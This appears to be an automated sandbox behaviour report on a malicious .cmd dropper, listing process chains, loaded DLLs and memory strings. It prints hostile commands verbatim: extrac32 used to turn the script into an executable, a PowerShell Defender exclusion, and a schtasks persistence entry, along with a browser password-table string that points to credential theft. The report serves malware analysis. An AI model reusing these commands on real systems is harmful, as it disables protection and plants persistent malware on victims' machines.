Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3392030847.00000000039FD000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO_KB#67897.cmd	Virustotal: Detection: 24%
Source: PO_KB#67897.cmd	ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_KB#67897.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO_KB#67897.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO_KB#67897.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: uxtheme.dll	Jump to behavior
